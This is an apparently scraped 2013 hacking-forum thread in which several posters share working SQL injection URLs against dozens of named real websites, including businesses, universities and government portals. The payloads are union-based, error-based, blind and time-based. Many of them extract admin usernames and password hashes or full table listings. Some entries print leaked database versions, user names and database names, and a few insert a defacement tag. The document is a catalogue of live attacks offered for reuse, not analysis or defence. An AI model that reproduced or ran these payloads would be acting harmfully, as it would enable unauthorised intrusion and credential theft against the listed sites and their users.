http://www.rielty-plus.ru/card4flat.php?id=22+or+1+group+by+concat((select+0 x76657273696f6e73716c),0x00,floor(rand(0)*2))havin g+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
socio.bas-net.by
PHP:
http://socio.bas-net.by/newsdetailed.php?id=23+or+1+group+by+concat((selec t+0x76657273696f6e73716c),0x00,floor(rand(0)*2))ha ving+min(0)+or+1--+
db 5 version
CY:40||PR:5
==================================================
shkolaint8.ru
PHP:
http://shkolaint8.ru/index.phtml?id=24+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
creator.org.ua
PHP:
http://creator.org.ua/show.php?id=26+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
www.hobbycenter.by
PHP:
http://www.hobbycenter.by/news.php?id=27+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:40||PR:5
==================================================
idel-travel.com
PHP:
http://idel-travel.com/t.php?id=31+or+1+group+by+concat((select+0x7665727 3696f6e73716c),0x00,floor(rand(0)*2))having+min(0) +or+1--+
db 5 version
CY:0||PR:1
==================================================
Russian Post
Code:
http://www.gcmpp.ru/zona/pravovie_documenti/pravovie_documenti.php?action=view&cat=2+and+1=0+Union+Select+1,2,0x4861636b656420627 9205365706f,4,5,6--
dom-secret.ru
PHP:
http://dom-secret.ru/article.php?id=31+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
bat.crimea.ua
PHP:
http://bat.crimea.ua/excursion_items/excursion_items.php?id=32+or+1+group+by+concat((se lect+0x76657273696f6e73716c),0x00,floor(rand(0)*2) )having+min(0)+or+1--+
db 5 version
CY:20||PR:1
==================================================
www.ishimtur.ru
PHP:
http://www.ishimtur.ru/index.php?id=35+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.hlebspb.ru
PHP:
http://www.hlebspb.ru/news.html?id=39+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.telar.ru
PHP:
http://www.telar.ru/products.php?id=39+or+1+group+by+concat((select+0x 76657273696f6e73716c),0x00,floor(rand(0)*2))having +min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.smol-kabel.ru
PHP:
http://www.smol-kabel.ru/index.php?module=catalog&id=89+and(select+1+from(select+count(*),concat((se lect+0x76657273696f6e73716c),0x00,floor(rand(0)*2) )x+from+information_schema.tables+group+by+x)a)--+
db 5 version
CY:90||PR:1
==================================================
www.prom-info.com
PHP:
http://www.prom-info.com/index.php?m=4&id=92+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
www.mynany.org
PHP:
http://www.mynany.org/index.php?module=articles&file=article&id=98+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:3
==================================================
www.matkarhea.fi
PHP:
http://www.matkarhea.fi/index.php?id=57+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:0||PR:3
==================================================
www.tpo-orlov.ru
PHP:
http://www.tpo-orlov.ru/?Id=50+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:0
==================================================
ufdvgu.ru
PHP:
http://ufdvgu.ru/events/anons/show/?id=51+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:350||PR:4
==================================================
www.medy.ru
PHP:
http://www.medy.ru/pages.php?id=59+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:30||PR:1
==================================================
nikimlt-povolgye.ru
PHP:
http://nikimlt-povolgye.ru/catalog_lvl2/?id=60+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:30||PR:2
==================================================
www.spycamera.ru
PHP:
http://www.spycamera.ru/print.php?id=62+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:400||PR:4
==================================================
suz-antiq.ru
PHP:
http://suz-antiq.ru/index.php?part=catalog&cat=7&id=67+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:2
==================================================
www.alfa-perevod.ru
PHP:
http://www.alfa-perevod.ru/ru/news?id=70+or+1+group+by+concat((select+0x76657273 696f6e73716c),0x00,floor(rand(0)*2))having+min(0)+ or+1--+
db 5 version
CY:90||PR:3
==================================================
www.marbellalux.ru
PHP:
http://www.marbellalux.ru/rent_apartament_order.php?id=70+or+1+group+by+conc at((select+0x76657273696f6e73716c),0x00,floor(rand (0)*2))having+min(0)+or+1--+
db 5 version
CY:10||PR:1
==================================================
www.travel.vbg.ru
PHP:
http://www.travel.vbg.ru/catalog/hotel.php?id=71+or+1+group+by+concat((select+0x766 57273696f6e73716c),0x00,floor(rand(0)*2))having+mi n(0)+or+1--+
db 5 version
CY:20||PR:4
==================================================
www.datsha.com
PHP:
http://www.datsha.com/rus/news.php?id=86+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:40||PR:4
==================================================
mice.crimea.ua
PHP:
http://mice.crimea.ua/news.php?id=88+or+1+group+by+concat((select+0x7665 7273696f6e73716c),0x00,floor(rand(0)*2))having+min (0)+or+1--+
db 5 version
CY:10||PR:2
==================================================
www.moreodor.ru
PHP:
http://www.moreodor.ru/php/page.php?m=57&id=101+or+1+group+by+concat((select+0x76657273696f 6e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:0||PR:0
==================================================
Unknowhacker
12.08.2013, 01:02
Code:
http://www.xits-sound.com/details.php?id=-13%27+union+select+1,2,3,%28select%28@x%29from%28s elect%28@x:=0x00%29,%28select%28null%29from%28xits soun.users%29where%280x00%29in%28@x:=concat%28@x,0 x3c62723e,username,0x3a,password%29%29%29%29x%29,5 ,6,7,8+--+
sabotage-rockgroup.ru
PHP:
http://sabotage-rockgroup.ru/modules/publication/article.php?id=1+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 5 version
CY:130||PR:1
==================================================
sochland.ru
PHP:
http://sochland.ru/sub5/?id=4+or+1+group+by+concat((select+0x76657273696f6 e73716c),0x00,floor(rand(0)*2))having+min(0)+or+1--+
db 5 version
CY:20||PR:3
==================================================
metrofashion.ru
PHP:
http://metrofashion.ru/content.php?id=5+or+1+group+by+concat((select+0x76 657273696f6e73716c),0x00,floor(rand(0)*2))having+m in(0)+or+1--+
db 4 version
CY:40||PR:2
==================================================
www.ryabov.com
PHP:
http://www.ryabov.com/article.php?id=36+or+1+group+by+concat((select+0x7 6657273696f6e73716c),0x00,floor(rand(0)*2))having+ min(0)+or+1--+
db 5 version
CY:0||PR:1
==================================================
http://
www.stratfordcitycentre.ca
/announce.php?id=49+and+1=2+union+select+1,2,group_ concat(username,0x3a,password),4 from users --+
================================
blind, the first letter of the database name is s
http://
www.scit.edu.in
/announce.php?id=14' and(substr(database(),1,1)='s') and '1 --+
================================
blind, MySQL version 5
http://
www.jmmgrace.com
/announce.php?id=P126' and(substr(version(),1,1)=5) and '1 --+
================================
http://
www.ripcoms.com
/announce.php?ID=1'+and+1=2+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================
Unknowhacker
12.08.2013, 17:46
Code:
http://hafiz-chair.com/gallery.php?id=-6+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28webbrend_h afiz.userlist%29where%280x00%29in%28@x:=concat%28@ x,0x3c62723e,user,0x3a,pass%29%29%29%29x%29+--+
http://www.sprucedanddappa.net/shop.php?id=2&sid=-3+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28hunterde_s dshop.admin%29where%280x00%29in%28@x:=concat%28@x, 0x3c62723e,admin_name,0x3a,admin_pass%29%29%29%29x %29,4,5+--+
Code:
http://vniispk.ru/news/konferenciya_2008/article.php?id=-6+and+1=0+Union+Select+1,2,3,4,5,0x4861636b6564206 279205365706f,7,8--
http://
www.vinta.ru
/humor.php?act=show&id=520+and+1=2+union+select+1,2,version(),group_co ncat(usertype,0x3a,username,0x3a,password),5 from zolotykh_users +--+&width=1467
================================
http://
www.belrotaryplunge.com
/participant.php?id=31'+and+1=2+union+select+1,2,3, 4,5,6,7,8,9,10,11,12,13,14,15,16,group_concat(user name,0x3a,password),18,19,20,21,22,23,24,25,26,27, 28,29 from users+--+
================================
http://
www.juinanews.com.br
/humor.php?id=4 and(substr(version(),1,1)=5) and 1 --+
================================
http://
www.rycorealty.com
/clientAdvantageNetwork/participant.php?id=-43+union+select+1,2,3,4,(select(@x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22 --+
================================
http://
www.imcconcerts.com
/tour.php?id=12+and+1=2+union+select+1,2,(select(@x ) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6,7,8,9,10,11,12, 13,14,15,16 --+
================================
TIC 2900
HTML:
http://rzd.inte[google]rgid.ru/index.php
The "From" ("Откуда") and "To" ("Куда") fields are vulnerable; the output is shown right away
Example: "'union select version() -- "
5.5.13-log
LIST_CITYES@xml.biletix.ru
http://
www.m.go4bike.com
/opinions.php?id=404'+and+1=0+union+select+1,2,3,4, 5,group_concat(loginname,0x3a,password),7,8,9 from admin --+
================================
pr=2
http://
www.sunbelt-reps.com
/territory.php?id=2+and+1=2+union+select+1,group_co ncat(cal_login,0x3a,cal_passwd),3,4,5,6,7,8 from webcal_user --+
================================
http://
www.jboiler.ru
/catalog/seria.php?se=-6+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),19,20,21,22,23,24 --+
================================
Code:
http://www.bullydog.com/preferred_dealer.php?dealer=-1+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,1 8,19,20,21,22,23,24,25,26,27,28,29,0x4861636b65642 06279205365706f--
http://
www.twitney.co.uk
/theme.php?id=7+and+row(1,1)>(select+count(*),concat((select +version()),0x3a,database(),0x3a,user(),floor(rand (0)*2)) x from information_schema.tables group by x )
================================
blind, MySQL 5 branch
http://
www.guidesonthefly.com
/river.php?id=39 and substring((version()),1,1)=5
================================
http://
www.vikon-ryad.com.ua
/dveri-terminus-seria.php?id=-1'+union+select+1,2,3,4,5,concat_ws(0x3a, version(),database(),user()) --+
================================
http://
www.detkinashi.ru
/chap.php?id=-6+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),3,4,5,6,7,8 --+
================================
pr=4, blind, MySQL version 5
http://
www.trim.no
/pub/art.php?id=1189' and (substring(database(),1,1))='a' and '1
Unknowhacker
16.08.2013, 18:04
Photographer Pavel Kiselev (see the title)
Code:
http://www.photokiselev.com/info.php?CID=-3+union+select+1,2,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28u36043.stu dent%29where%280x00%29in%28@x:=concat%28@x,0x3c627 23e,login,0x3a,pass%29%29%29%29x%29,4,5,6,7,8,9+--+
Weekly newspaper "Tsentr Goroda" (Naro-Fominsk)
Code:
http://cgnf.ru/rubric.php?id=2112+and+1=2+union+select+1,2,3,4,%2 8select%28@x%29from%28select%28@x:=0x00%29,%28sele ct%28null%29from%28cgnf.tch_users%29where%280x00%2 9in%28@x:=concat%28@x,user_login,0x3a,user_passwor d%29%29%29%29x%29,6,7,8,9+--+
See line 254 of the page source.
GOV
SHARJAH INTERCITY TRANSPORT
Code:
http://www.stc.gov.ae/en/transport-intercity-routes-result.php?id=-112+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database()),5,6,7,8,9,10,11,12,13--
Unknowhacker
17.08.2013, 16:45
Notoriety Inc.
Code:
http://www.hanhdance.com/contact.php?id=-46+union+select+1,2,3,%28select%28@x%29from%28sele ct%28@x:=0x00%29,%28select%28null%29from%28hanhdan ceeditor.admin_users%29where%280x00%29in%28@x:=con cat%28@x,0x3c62723e,username,0x3a,password%29%29%2 9%29x%29,5,6,7,8+--+
.:Uruk-hai:.
Code:
http://www.urukhai.ru/comment.php?id=59%27+union+select+1,2,3,4,version% 28%29,6,7+--+
4.1.22-lk-log
TIC 140
http://www.runitsa.ru/author.php?id=-1932+union+select+1,2,3,concat_ws%280x3a,login,pas swd%29+from+runitsa_admin_users--
http://
www.culdesac.nl
/artmeets/title.php?id=94+union+select+1,column_name,3,4,5,6 ,7,8,9 from information_schema.columns where table_schema=0x63756c6465736163 and table_name=0x77705F7573657273 limit 2,2 --+
================================
http://
www.airwaysmag.com
/channels.html?channel_id=999999.9+union+select+1,2 ,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4,5,6,7,8,9,10,11,12, 13,14,15,16,17,18,19,20,21,22,23 --+
================================
http://
www.larksfieldplace.org
/residents-arts-culture.php?ID=-46'+union+select+1,2,3,4,(select(@x)from(select (@x:=0x00),(select(0)from(Larksfield_Data.CMS_Logi n)where(0x00)in(@x:=concat(@x,0x3c62723e,username, 0x3a,password))))antichat),6,7,8,9,10,11,12,13,14, 15,16,17,18,19,20 --+
================================
blind, MySQL 5 branch
http://
www.psware.com
/Culture.php?id=10 and (substring(version(),1,1)=5)
================================
Unknowhacker
19.08.2013, 13:03
Code:
http://www.hkyongnuo.com/e-detail.php?ID=288+and+%28select*from%28select+coun t%28*%29from%28select+1+union+select+2+union+selec t+3%29x+group+by+concat%28mid%28%28select+TABLE_NA ME+from+INFORMATION_SCHEMA.TABLES+limit+0,1%29,1,6 4%29,floor%28rand%280%29*2%29%29%29z%29+and+1
Future Fins Surf Board Technology
Code:
http://www.futuresfins.com/fin-detail.php?id=-173+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28Future_fut ure2.users%29where%280x00%29in%28@x:=concat%28@x,0 x3c62723e,username,0x3a,password%29%29%29%29x%29,3 ,4,5,6,7,8,9,10,11+--+
Asian Socio-Economic Society
Code:
http://www.aessweb.com/journal-detail.php?id=-5002%27+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13 ,14,15,16,17,%28select%28@x%29from%28select%28@x:= 0x00%29,%28select%28null%29from%28pdoajcom_aess.us ers%29where%280x00%29in%28@x:=concat%28@x,0x3c6272 3e,loginid,0x3a,pwd%29%29%29%29x%29+--+
PromKhimiya
Code:
http://www.phas.ru/products.php?id=-64+union+select+1,2,3,4,version%28%29+--+
4.1.22-standard-log
blind, MySQL version 5
http://
www.gpsnamibia.com
/culture/culture.php?id=16' and (substr(version(),1,1)=5) and '1
================================
http://
www.morganmetals.com
/river.php?id=-2'+union+select+1,2,concat(username,0x3a,password) ,4,5,6,7 from admin limit 0,1 --+
================================
http://
www.apfelkraft.ch
/vb/review.php?softwareid=-1090+union+all+select+1,2,3,4,5,6,7,8,9,10,11,12,1 3,14,15,16,17,18,(select( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),20,21,22,23,24,25,26, 27,28,29,30,31,32,33,34,35,36,37,38,39,40,41,42,43 ,44,45,46,47,48,49,50 --+
================================
blind
http://
www.ikebanasmt.com
/pop.php?id=39' and (substr(version(),1,1)=5) and '1
================================
http://
www.jdls.com
/pop.php?ID=21863'+union+all+select+1,2,3,4,5,(sele ct( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),7,8,9 --+&CAT=21
================================
Unknowhacker
21.08.2013, 17:19
Intercom Holding group of companies
Code:
http://www.gleot.com/news.php3?nid=-94%27+union+select+1,2,3,4,5,%28select%28@x%29from %28select%28@x:=0x00%29,%28select%28null%29from%28 information_schema.columns%29where%28table_schema! =0x696e666f726d6174696f6e5f736368656d61%29and%280x 00%29in%28@x:=concat%28@x,0x3c62723e,table_schema, 0x2e,table_name,0x3a,column_name%29%29%29%29x%29,7 ,8+--+
Today: blind
http://
www.siam-indo.com
/general.php?id=8 and substring(version(),1,1)=5
================================
http://
www.4urendezvous.com
/pop.php?id=4 and (substring(version(),1,1)=5)
================================
http://
www.justfindit.ca
/html/ad_detail.php?id=44953 and if(substring(version(),1,1)=5,SLEEP(5),1) --
================================
nemaniak
22.08.2013, 14:13
sfjb.org PR-5
Code:
http://sfjb.org/news/index.php?newsid=-314+union+select+1,2,concat_ws(0x3a,version(),user (),database()),4,5,6,7+--+
Code:
5.0.67-COMMUNITY:SFJB@LOCALHOST:SFJBDB
tribalnetonline.com PR-5
Code:
http://tribalnetonline.com/displaynews.php?newsid=-213+UNION+SELECT+1,2,3,4,concat_ws(0x3a,version(), user(),database()),6,7,8,9,10,11,12,13,14,15,16,17 ,18,19,20,21+--+
Code:
5.0.96-community-log:tribal6@localhost:tribal6_main
beywatch.eu PR-5
Code:
http://beywatch.eu/veille_detail.php?num=-59+union+select+1,concat_ws(0x3a,version(),user(), database()),3,4,5,6,7,8,9,0,11,12,13,14,15,16,17,1 8+--+
Code:
5.5.33-log:istseaeu_bayroot@localhost:istseaeu_beywatch
drii.org PR-6
Code:
https://drii.org/newsdetails.php?newsid=-5'+union+select+1,2,concat_ws(0x3a,version(),user( ),database()),4,5,6,7,8,9,0,11,12,13,14,15+--+
Code:
5.0.91-community:driwebm_mydri2@localhost:driwebm_mydri2
http://
www.exchange.abnormalcycles.com
/pop.php?id=6+union+all+select+1,2,3,4,5,6,7,concat (version(),0x3a,database(),0x3a,user()),9,10,11,12 ,13,14,15,16,17,18 --+
================================
http://
www.acttravel.com.au
/general.php?id=2+and+1=2+union+all+select+1,2,(sel ect( @x) from( select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4 --+
================================
BuyTRAFFIK said:
http://2012over.ru/mneniya-posetiteley-o-konce-svata-v-2012-godu.html'
What should be done here?
http://2012over.ru/m'or(1=(select(1)from(select/**/count(*),concat(0x427920496E6F6D73,0x3A,user(),0x3 A,version(),0x3A,database(),floor(rand(0)*2))w/**/from(information_schema.columns)/**/group/**/by/**/w)a))and('')='
Unknowhacker
23.08.2013, 23:04
ANPED Northern Sustainable Alliance
Code:
http://www.anped.org/index.php?part=-112%27+union+select+1,2,3,4,5,%28select%28@x%29fro m%28select%28@x:=0x00%29,%28select%28null%29from%2 8anped.users%29where%280x00%29in%28@x:=concat%28@x ,0x3c62723e,username,0x3a,password%29%29%29%29x%29 ,7,8,9,10+--+
pr=8
http://
www3.bkpm.go.id
/mobile/content/general.php?m=-2'+union+all+select+1,2,3,concat_ws(0x3a,salt,user name,password),5,6,7,8,9,10,11+from users --+
================================
pr=5
http://
phd.dii.unisi.it
/general/general.php?id=-4+union+all+select+1,2,concat_ws(0x3e,version(),da tabase(),user()),4,5 --+
================================
pr=4
http://
www.drinksontario.com
/memberinfo.php?id=-70+union+all+select+1,2,3,concat(version(),0x3a,da tabase(),0x3a,user()),5,6,7,8,9,10,11,12 --+
================================
Unknowhacker
24.08.2013, 21:44
Code:
http://www.hkyongnuo.com/e-detail.php?ID=-2+union+select+1,2,3,4,5,6,7,8,9,10,11,12,13,14,15 ,16,17,18,19,20,21,22,%28select%28@x%29from%28sele ct%28@x:=0x00%29,%28select%28null%29from%28informa tion_schema.columns%29where%28table_schema!=0x696e 666f726d6174696f6e5f736368656d61%29and%280x00%29in %28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,ta ble_name,0x3a,column_name%29%29%29%29x%29,24,25,26 ,27,28,29,30,31,32,33,34,35,36,37,38,39,40+--+
V. N. Karazin Kharkiv National University
Code:
http://www.univer.kharkov.ua/en/general/univer_today/photos?cat=-411+union+select+1,%28select%28@x%29from%28select% 28@x:=0x00%29,%28select%28null%29from%28informatio n_schema.columns%29where%28table_schema!=0x696e666 f726d6174696f6e5f736368656d61%29and%280x00%29in%28 @x:=concat%28@x,0x3c62723e,table_schema,0x2e,table _name,0x3a,column_name%29%29%29%29x%29+--+&year=2666
pr=6
http://
www.jpkc.hfut.edu.cn
/2007/szlj/memberInfo.php?id=-1'+union+all+select+1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(szlj.user)where(0x00)in( @x:=concat(@x,0x3c62723e,name,0x3a,psw))))antichat ) --+
================================
http://
www.graphene-flagship.eu
/GFreg/MemberInfo.php?member=534+union(select +1,2,3,(select(@x)from(select (@x:=0x00),(select(0)from(phantoms_membersGF.tblUs ers)where(0x00)in(@x:=concat(@x,0x3c62723e,login, 0x3a,password))))antichat),5,6,7,8,9,10,11,12,13,1 4,15,16,17,18,19,20,21,22,23,24,25,26,27,28) --+
================================
http://
www.0931mmjy.com
/MemberInfo.php?id=-58+union+select+1,2,group_concat(0x3a,name,pwd),4, 5,6,7,8,9,10 from tb_user --+
================================
http://bolshevik-bowling.com.ua/info.php?id=-2+union+select+1,2,@@version
An interesting find (at least for me)
I found an injection at http://www.gfvastgoed.be/detail.php?id=840868.
As blind, everything works:
http://
www.gfvastgoed.be
/detail.php?id=840868+and substring(version(),1,1)=5+--+
We work out the number of columns... there are as many as 407
YaBtr said:
We work out the number of columns... there are as many as
407
Ololo
Code:
http://www.gfvastgoed.be/detail.php?id=-1/**/union(select(0),1,2,3,4,5,6,7,8,9,10,11,12,13,14,1 5,16,17,18,19,20,21,22,23,24,25,26,27,concat(user( ),0x3A,database(),0x3A,version(),0x3A),29,30,31,32 ,33,34,35,36,37,38,39,40,41,42,43,44,45,46,47,48,4 9,50,51,52,53,54,55,56,57,58,59,60,61,62,63,64,65, 66,67,68,69,70,71,72,73,74,75,76,77,78,79,80,81,82 ,83,84,85,86,87,88,89,90,91,92,93,94,95,96,97,98,9 9,100,101,102,103,104,105,106,107,108,109,110,111, 112,113,114,115,116,117,118,119,120,121,122,123,12 4,125,126,127,128,129,130,131,132,133,134,135,136, 137,138,139,140,141,142,143,144,145,146,147,148,14 9,150,151,152,153,154,155,156,157,158,159,160,161, 162,163,164,165,166,167,168,169,170,171,172,173,17 4,175,176,177,178,179,180,181,182,183,184,185,186, 187,188,189,190,191,192,193,194,195,196,197,198,19 9,200,201,202,203,204,205,206,207,208,209,210,211, 212,213,214,215,216,217,218,219,220,221,222,223,22 4,225,226,227,228,229,230,231,232,233,234,235,236, 237,238,239,240,241,242,243,244,245,246,247,248,24 9,250,251,252,253,254,255,256,257,258,259,260,261, 262,263,264,265,266,267,268,269,270,271,272,273,27 4,275,276,277,278,279,280,281,282,283,284,285,286, 287,288,289,290,291,292,293,294,295,296,297,298,29 9,300,301,302,303,304,305,306,307,308,309,310,311, 312,313,314,315,316,317,318,319,320,321,322,323,32 4,325,326,327,328,329,330,331,332,333,334,335,336, 337,338,339,340,341,342,343,344,345,346,347,348,34 9,350,351,352,353,354,355,356,357,358,359,360,361, 362,363,364,365,366,367,368,369,370,371,372,373,37 4,375,376,377,378,379,380,381,382,383,384,385,386, 387,388,389,390,391,392,393,394,395,396,397,398,39 9,400,401,402,403,404,405,406)
P.S. Use Notepad to replace all the spaces with nothing.
pr=3
http://
www.georgiasocietyofhearingprofessionals.com
/pages/memberinfo.php?id=21+and if(substr(version(),1,1)=5,sleep(5),1)
================================
pr=2
http://
www.hkfootwear.org
/en/memberInfo.php?id=-1099+union+select+1,2,concat_ws(0x3a,adminname,adm inpwd),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,2 0,21,22,23,24,25,26,27,28,29 from tbl_admin --+
================================
pr=2
http://
www.pch-workshop.com
/MemberInfo.php?Id=-12+union+all+select+1,2,(select(@x)from(select (@x:=0x00),(select(0)from(information_schema.colum ns)where(table_schema=database())and(0x00)in(@x:=c oncat(@x,0x3c62723e,table_schema,0x2e,table_name,0 x3a,column_name))))antichat),4 --+
================================
DezMond™
28.08.2013, 16:00
http://www.pie-mag.com/no_cache/event-details.html?event_id=59+and+1=0+union+select+1,2, 3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21, 22,23,24,25,26,27,28,29,30,31,32,33,34,35,36,37,38 ,39,40,41,42,43,44,45,46,47,48,49,50,51,52,53,54,5 5,56,57,58,59,60,61,62,63,64,65,66,67,68,69,70,71, 72,73,74,75,76,77,78,79+--+
http://
www.actradingpost.com
/trade.php?ID=413+and+1=2+union+select+1,2,3,4,(sel ect(@x)from(select (@x:=0x00),(select(0)from(ACTradingPost.Profile)wh ere(0x00)in(@x:=concat(@x,0x3c62723e,name,0x3a,pas sword))))antichat),6 --+
================================
pr=3
http://
www.bwjava.com
/tools-of-the-trade.php?id=90'+and+(substr(version(),1,1)=5)+and +'1
================================
pr=3 TIC=10
http://
www.somerikko.net
/collection/trade.php?id=2222+union+select+1,2,3,concat_ws(0x3 a,version(),user(),database()),5 --+
================================
http://
www.hartlepoolcarers.org.uk
/page-select.php?id=3+and+1=2+union+select+1,(select( @x) from( select (@x:=0x00),(select(0)from(carers.users)where(0x00) in(@x:=concat(@x,0x3c62723e,username,0x3a,pass)))) antichat),3,4,5,6+--+
================================
http://
nba-ube.main.jp
/m/memberinfo.php?id=-00016+union+select+1,group_concat(name,0x3a,passwo rd),3,4,5,6,7,8 from MEMBERS --+
================================
http://
www.maw.cn
/en/trade.php?id=11+and+1=2+union+select+1,2,3,concat_ ws(0x3a,username,pwd),5,6,7,8 from admin_user --+
================================
Code:
http://www.maglain.ru/news.php?nid=-121+union+select+1,2,3,concat_ws(0x3a,version(),us er(),database(),0x4861636b6564206279205365706f),5 ,6,7,8,9,10, 1 1 ,12,13,14,15,1 6,17,18,19,20,21--
Code:
http://www.arteventjewelry.com/trade.php?id=-4+union+select+@@version
Code:
http://www.gymnasium100.nl/productinfo.php?id=-3+union+select+1,concat_ws(0x3a,version(),user(),d atabase()),3,4,5,6,0x4861636b6564206279205365706f, 8,9,10,11,12--
Unknowhacker
02.09.2013, 14:21
Cherkasy Regional State Administration.
Code:
http://www.oda.ck.ua/index.php?lng=ukr§ion=&article=-183+union+select+1,2,%28select%28@x%29from%28selec t%28@x:=0x00%29,%28select%28null%29from%28informat ion_schema.columns%29where%28table_schema!=0x696e6 66f726d6174696f6e5f736368656d61%29and%280x00%29in% 28@x:=concat%28@x,0x3c62723e,table_schema,0x2e,tab le_name,0x3a,column_name%29%29%29%29x%29,4+--+
PHP:
http://www.madminutemusic.com/artist.php?artist_id=-35+union+select+1,concat(version(),0x3a,user(),0x3 a,database()),3,4,5,6,7,8,9,10,11,12,13,14,15,16,1 7,18,19,20,21,22,23,24,25,26,27,28,29,30,31,32,33, 34,35,36,37,38,39--
PR: 4
version: 5.1.66
user: mondomix103@localhost
database: mondomix103_madminute
Code:
http://www.blackberryrecords.com/artist.php?artist_id=-177+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4--
PR: 3
version: 5.5.33-log
user: blackbj3_admin@localhost
database: blackbj3_brecords_blackberry
Code:
http://gailseverngallery.com/index.php/component/gailsevern/view/artist/id/-732+union+select+1,2,concat(version(),0x3a,databas e(),0x3a,user()),4,5,6,7,8,9,10,11,12--
PR: 4
version: 5.1.54
user: gailsevern@localhost
database: gailsevern_joom
Code:
http://www.gallerish.com/artist.php?ArtistID=-856/**/union/**/select/**/concat(version(),0x3a,user(),0x3a,database())--
PR: 2
version: 5.5.33-log
user: galleri8_conn001@localhost
database: galleri8_ArtShowcase
Unknowhacker
02.09.2013, 23:50
FLOATING LIFE: yacht purchase, sale and charter!
Code:
http://www.floatinglife.com/management.php?ID=-29+union+select+1,%28select%28@x%29from%28select%2 8@x:=0x00%29,%28select%28null%29from%28floatinglif e.utenti%29where%280x00%29in%28@x:=concat%28@x,0x3 c62723e,user,0x3a,pwd%29%29%29%29x%29,3,4+--+
Code:
